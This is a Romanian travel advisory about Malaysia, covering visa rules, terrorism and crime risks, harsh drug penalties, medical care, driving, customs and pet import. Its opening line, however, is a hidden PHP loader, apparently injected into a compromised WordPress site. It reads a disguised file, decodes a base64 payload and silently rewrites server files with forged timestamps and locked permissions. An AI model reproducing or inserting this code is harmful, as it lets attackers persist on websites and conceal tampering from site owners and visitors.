$wp_update_file="/home/shuffles/public_html/wp-admin/user/screens.php"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } Malaezia – O noua atitudine

Condiţii de intrare şi regim de şedere

Între România şi Malaezia există un regim de scutire reciprocă de vize în cazul cetăţenilor proprii pentru o perioadă de maxim 90 de zile, în scopuri nelucrative. Orice şedere mai lungă de 90 de zile, indiferent de scopul ei (căsătorie, studii, muncă, vizită, turism), presupune obţinerea, în prealabil, a unei vize de lungă şedere. Aceasta poate fi obţinută la orice misiune diplomatică malaeziană din străinătate.

Atenţionăm cetăţenii români că paşaportul trebuie să fie valabil cel puţin şase luni de la data ieşirii din România.

La punctele de frontieră malaeziene se aplică cetăţenilor români o viză (nenominală), sub forma unei ştampile în paşaport, prin care se acorda care dreptul de şedere în Malaezia pentru o perioadă de 90 de zile, conform acordului dintre cele două state. Cu toate acestea, se recomandă cetăţenilor români să verifice, la punctul de frontieră, dacă ştampila malaeziană prevede într-adevăr dreptul lor de şedere pentru 90 de zile, sau doar pentru 30 de zile, întrucât unii funcţionari locali pot reduce din proprie iniţiativă această perioadă legal admisă.

În acelaşi timp, se recomandă în mod deosebit cetăţenilor români care doresc să beneficieze de toată durata vizei să calculeze cu atenţie data la care trebuie să părăsească Malaezia, deoarece ştampila din paşaport prevede 90 de zile de la data intrării în ţară, fără însă a specifica data ultimei zile de valabilitate a vizei. Autorităţile malaeziene sunt extrem de stricte în privinţa încadrării în termenele indicate. Depăşirea perioadei de valabilitate a vizei poate fi sancţionată cu expulzarea din Malaezia, sau chiar cu detenţie, urmată de expulzare. Măsura este determinată de existenţa unui număr foarte mare de cetăţeni străini fără forme legale, care muncesc în Malaezia.

Cetăţenii români care călătoresc din Malaezia peninsulară, în statele Sarawak şi Sabah, din nordul insulei Borneo, trebuie să aibă asupra lor paşaportul, deşi deplasarea se efectuează în interiorul teritoriului malaezian. Autorităţile locale din cele două state solicită prezentarea paşaportului la sosire şi plecare chiar pentru zborurile interne.

Începând cu 1 iunie 2011, toţi cetăţenii străini care intră în Malaezia prin frontierele terestre, aeriene sau pe mare, vor fi amprentaţi obligatoriu în cadrul sistemului biometric naţional de înregistrare a străinilor (National Foreigners Enforcement and Registration System – NERS) la cele 96 de puncte de intrare în ţară. La sosirea în Malaezia vor fi scanate amprentele degetului mare şi a indexului de la ambele mâini. Fac excepţie de la amprentarea biometrică copiii sub 12 ani, deţinătorii paşapoartelor diplomatice, vizitatorii cu dizabilităţi (fără degete).

Sistemul biometric de înregistrare va asigura monitorizarea eficientă a cetăţenilor străini aflaţi pe teritoriul Malaeziei. Sistemul va emite avertizări pentru persoanele care vor depăşi termenul legal de şedere.

Pentru mai multe informaţii privind regimul de călătorie în Malaezia, recomandăm consultarea informaţiilor puse la dispoziţie de autorităţile malaeziene:

  • Ministerul Afacerilor Externe al Malaeziei
  • Ambasada Malaeziei în România (Piaţa Cantacuzino 1, Bucureşti; Tel: 021-211-3801; Fax. 021-210- 0270; E-mail: mwbucrst@itcnet.ro)

Ministerul Afacerilor Externe recomandă cetăţenilor români care intenţionează să rămână pentru o perioadă îndelungată pe teritoriul acestui stat să se adreseze misiunii diplomatice a României şi să îşi anunţe prezenţa în regiune, comunicând coordonatele personale pentru a putea fi contactaţi în situaţii de urgenţă.

Ameninţări teroriste

Guvernul malaezian duce o politică de maximă vigilenţă şi intransigenţă faţă de fenomenul terorist, care este însă o realitate prezentă în toată Asia de sud-est. Chiar dacă în Malaezia nu s-au înregistrat atentate cu bombe sau execuţii aleatorii, fenomenul terorist s-a manifestat, începând din anul 2000, prin răpirile de persoane din rândul turiştilor, mai ales în insulele izolate din estul statului Sabah, de către grupări cu baza în sudul insulelor Filipine, care acţionează sub egida organizaţiei terorist-separatiste Abu Sayyaf.

Începând din 2004, marina şi poliţia de coastă malaeziene patrulează intens apele teritoriale dintre Malaezia şi Filipine, în estul coastelor statului Sabah, iar autorităţile malaeziene dau asigurări constante că zona este sigură pentru turism. Cu toate acestea se recomandă ca excursiile pe mare către insulele îndepărtate de coastă să se facă numai după consultarea agenţiilor de turism, cu înscrierea nominală pe listele acestora şi folosind numai ambarcaţiuni puse la dispoziţie de firmele de transport oficiale, care operează sub protecţia forţelor de securitate malaeziene, evitându-se improvizaţiile oferite de indivizi privaţi locali.

Persoanele care doresc să călătorească din Malaezia în sudul Thailandei sunt avertizate că, de la începutul anului 2004, se înregistrează o recrudescenţă a terorismului în provinciile thailandeze Pattani, Yala, Narathiwat şi Songkhla, aflate la frontiera cu Malaezia. Aici au murit peste 500 de persoane, multe din ele executate la întâmplare de către membrii grupărilor separatist-fundamentaliste din zonă, care vizează în special obiectivele turistice: hoteluri, baruri, magazine, pieţe, infrastructura rutieră. Autorităţile malaeziene recomandă evitarea călătoriilor în zona din sudul Thailandei, dacă acestea nu sunt neapărat necesare.

Siguranţă şi criminalitate

Fiind o destinaţie turistică majoră în Asia de sud-est, Malaezia primeşte anual 11-12 milioane de turişti din toată lumea. Climatul general în ţară este unul de siguranţă pentru turiştii străini care nu-şi asumă riscuri, dar, cu toate acestea, o parte din formele de infracţionalitate înregistrate este legată tocmai de afluxul turistic.

Malaezia are o politică extrem de dură în privinţa combaterii traficului si consumului de droguri. Conform legislaţiei locale, pedeapsa cu moartea se aplică automat (indiferent de naţionalitate şi de cantitatea transportată) persoanelor implicate în traficul de droguri. Posesorii de droguri sau de stimulente amfetaminice pentru consum propriu se sancţionează atât cu închisoarea pe termen lung, cât şi cu pedepse corporale.

 

Cele mai frecvente infractiuni sunt furtul de paşapoarte, genţi, obiectelor din maşini, clonarea cărţilor de credit, loteriile frauduloase prin internet.

Recomandări generale

  • Să evite  manifestaţiile cu caracter politic;
  • Să păstreze în locuri sigure documentele şi valorile personale, biletele de călătorie, banii, cărţile de credit şi să nu le expună în mod vizibil;
  • Să aibă, în permanenţă, asupra lor copia actului de identitate, preferabil copia paşaportului turistic;
  • Să aibă o atitudine respectuoasă faţă de tradiţiile şi obiceiurile locale;
  • Să respecte cu stricteţe anunţurile şi recomandările autorităţilor locale;
  • Să nu se implice în traficul de droguri! Statul Malaezia are o politică extrem de dură în această privinţă. Conform legislaţiei locale persoanele implicate în traficul de droguri primesc automat pedeapsa capitală. De asemenea, deţinătorii de droguri sau de stimulente amfetaminice primesc condamnări la închisoare pe termen lung şi pedepse corporale. În caz de suspiciune, la intrarea în ţară călătorii pot fi supuşi unor probe biologice. Dacă acestea se dovedesc pozitive, turiştii pot fi internaţi în clinici de dezintoxicare sau expulzaţi, cu interdicţia de a mai intra în Malaezia;

În cazul unor incidente care afectează siguranţa persoanei sau a bunurilor, se recomandă contactarea celui mai apropiat birou al poliţiei. În cazul pierderii paşaportului românesc, se recomandă sesizarea atât a biroului local de poliţie, cât şi a oficiului consular român cel mai apropiat.

În cazul unor incidente grave (accidente, tâlhării), care necesită intervenţia imediată a autorităţilor, trebuie apelat numărul de urgenţă al poliţiei:

  • Poliţia – 999

Se recomandă, de asemenea, sesizarea Ambasadei României, care poate acorda asistenţă consulară în condiţiile prevăzute de lege. Pentru infracţiuni de mai mică gravitate, tribunalul poate decide, înainte de judecarea inculpatului, eliberarea sa pe cauţiune şi cuantumul acesteia. Decizia este strict la discreţia judecătorului. La cerere, inculpaţii pot fi vizitaţi în detenţie de reprezentanţi ai ambasadei.

Malaezia este o ţară predominant musulmană, dar ea nu impune un cod vestimentar strict nici conaţionalilor săi, nici vizitatorilor de alte religii. Cu toate acestea, se recomandă o ţinută vestimentară decentă în toate situaţiile, mai cu seamă la vizitarea unor muzee şi moschei. Anumite detalii vestimentare, care nu trezesc reacţii în alte ţări, pot fi percepute de o parte a publicului local drept provocatoare şi transmite impresii greşite, având drept rezultat replici sau atitudini dispreţuitoare. Pe plajele malaeziene costumul de baie complet este obligatoriu.

Sistemul medical

Deşi călătoriile în Malaezia sunt în general sigure şi nu pun probleme deosebite turiştilor care evită situaţiile de risc, se recomandă totuşi încheierea unei asigurări medicale şi de călătorie înainte de plecarea din ţară. În Malaezia sunt acceptate asigurările medicale de călătorie încheiate în alte ţări. Spitalele private malaeziene oferă tratamente de calitate şi au dotări tehnice de ultimă oră, dar preţurile serviciilor medicale sunt ridicate.

Nu există obligativitatea vaccinării la intrarea în Malaezia pentru nici un fel de boală. Turiştilor care vin în această ţară li se recomandă totuşi să consulte un medic înainte de a călători, în legătură cu posibila imunizare împotriva unor boli tropicale. Sunt relativ răspândite tuberculoza şi hepatitele A şi B, precum şi febra dengue, împotriva căreia însă nu există vaccin.

În cazul când au nevoie de asistenţă medicală sau stomatologică în condiţii de urgenţă, turiştii români sunt sfătuiţi să se adreseze în primul rând recepţiei hotelului unde sunt cazaţi, care poate contacta serviciul de ambulanţă sau îi poate dirija spre cel mai apropiat spital sau cabinet stomatologic.

Condiţii privind traficul auto

  • Circulaţia auto

În Malaezia, circulaţia se desfăşoară pe partea stângă.


  • Centura de siguranţă

Centura de siguranţă este obligatorie pentru locurile din faţă.


  • Starea generală a drumurilor

În ultimele două decenii, s-au făcut mari investiţii în infrastructura rutieră, care se prezintă la un nivel de vârf. Toate autostrăzile sunt bine amenajate şi întreţinute, având servicii (popasuri cu staţii de alimentare, bufete, restaurante, magazine şi grupuri sanitare curate) la fiecare 30-40 km.

Autostrăzile sunt cu taxă. Drumurile naţionale şi alte şosele se prezintă în general în stare bună, carosabilul fiind reparat şi refăcut periodic.


  • Limita de viteză

Limita de viteză pe autostradă este de110 km/oră dar, pe anumite segmente marcate cu claritate, ea poate fi redusă până la 80-90 km/oră.


  • Parcarea

Parcările în oraşe sunt bine reglementate, indicate şi clar trasate pe carosabil. Bordurile înalte nu permit parcarea cu două roţi pe trotuar. Există parcări la nivelul solului sau supraetajate la toate hotelurile, complexele comerciale sau în apropierea punctelor de interes turistic. De-a lungul trotuarelor sunt trasate dungi galbene, care interzic parcarea în timpul zilei. Vehiculele parcate în locuri interzise sunt tractate pe cheltuiala conducătorului auto.În intersecţiile nemarcate şi la sensurile giratorii se aplică prioritatea de dreapta. Limita admisă de alcoolemie este 0,08 0/00.


  • Informaţii pentru cazuri de accidente

În cazul producerii unui accident uşor de circulaţie, maşina trebuie trasă la marginea drumului, pentru a se evita producerea altor accidente şi aşteptată sosirea poliţiei rutiere, care în general este promptă şi eficientă.


  • Permisul de conducere

Deşi în privinţa recunoaşterii reciproce a permiselor de conducere nu există un acord bilateral, se poate utiliza permisul de conducere românesc în Malaezia pentru o perioadă de 90 de zile. Pentru cei care stau mai mult de 90 de zile în Malaezia, se recomandă contactarea autorităţii în domeniul transportului rutier pentru obţinerea unui permis de conducere malaezian sau a unui permis de conducere internaţional (reînnoibil anual).


Utilizarea cărţilor de credit

Sunt acceptate majoritatea cărţilor de credit cu circulaţie internaţională (Visa, MasterCard, Diners, American Express). Totuşi, pentru siguranţă, turiştii români pot consulta banca emitentă spre a constata dacă o altă carte de credit, pe care o deţin, este acceptată sau nu în Malaezia.

Reglementări vamale

Orice bagaj poate fi inspectat în totalitate de către funcţionarii vamali la intrarea în Malaezia.

Produsele taxabile sau a căror introducere în Malaezia este restricţionată sunt următoarele: toate produsele electrice au nevoie de permis de import; toate produsele mai noi de 6 luni sunt taxabile (se recomandă păstrarea facturilor de cumpărare pentru a putea fi prezentate la cerere); videocasete şi filme profesioniste (trebuiesc vizionate de Film Censorship Board) pe cheltuiala deţinătorului; obiecte din metale preţioase; plantele au nevoie de Certificat Fitosanitar eliberat de Ministerul Agriculturii; calculatoarele nu se taxează, dar numărul lor este limitat la 3 bucăţi de familie, având nevoie de licenţă de import; nu pot fi vândute în interval de un an de la introducerea în Malaezia; băuturile alcoolice şi ţigările sunt supuse unor taxe ridicate de import.

Următoarele produse sunt interzise la introducerea în ţară (conform informaţiilor puse la dispoziţie de autorităţile vamale malaeziene): arme de foc, alte arme, artificii, explozibili, muniţie, cuţite; narcotice şi droguri (infractorii sunt pedepsiţi prin pedeapsa cu moartea); alimente, indiferent de natura lor; materiale pornografice sau cu caracter politic subversiv (cărţi, videocasete, filme); lingouri de aur; aparate de telefon şi fax (este necesară licenţă de import); aparate de radio cu unde scurte; publicaţii cu caracter comunist; orice produs de provenienţă din Israel.

La intrarea şi ieşirea din ţară, călătorii pot avea asupra lor o sumă în moneda naţională malaeziană (ringgit) care să nu depăşească 1.000 RM (circa 300 USD). Nu există restricţii în privinţa introducerii altor valute (în numerar sau cecuri de călătorie), sau a scoaterii lor la plecare, cu condiţia ca suma scoasă din ţară în nici un caz să n-o depăşească pe cea introdusă la venire. Dacă apar neconcordanţe în această privinţă, sancţiunile merg de la o amendă de 10.000 RM (3.000 USD) până la o pedeapsă cu închisoarea de 3 ani, sau ambele.

Regimul medicamentelor

Nu există limitări cantitative la introducerea unor medicamente în Malaezia, dar cele de tip amfetaminic sunt asimilate cu drogurile, iar deţinerea de droguri antrenează pedepse severe, mergând până la pedeapsa capitală.

Regimul animalelor de companie

Animalele de companie pot fi introduse în Malaezia numai după obţinerea unei autorizaţii de import, înainte de intrarea animalului în ţară. Acesta are nevoie de un certificat de sănătate, eliberat în interval de maximum 7 zile înainte de data zborului, care să ateste că animalul provine dintr-o ţară fără pericol de rabie. Dovada de vaccinare trebuie să ateste că animalul a făcut toate vaccinurile necesare într-un interval de 30-180 de zile înainte de data zborului. Documentele medicale însoţitoare trebuie să menţioneze rasa, vârsta, culoarea şi numele animalului, numele proprietarului şi detaliile zborului. Persoanele care călătoresc cu animale de companie trebuie să anunţe aeroportul cu minimum o săptămână înainte de data sosirii în Malaezia, pentru a rezerva spaţiu de carantină. Animalele petrec obligatoriu o lună în carantină, dar pot fi eliberate după două săptămâni, urmând să efectueze restul perioadei de carantină la domiciliul proprietarului.

By o9admin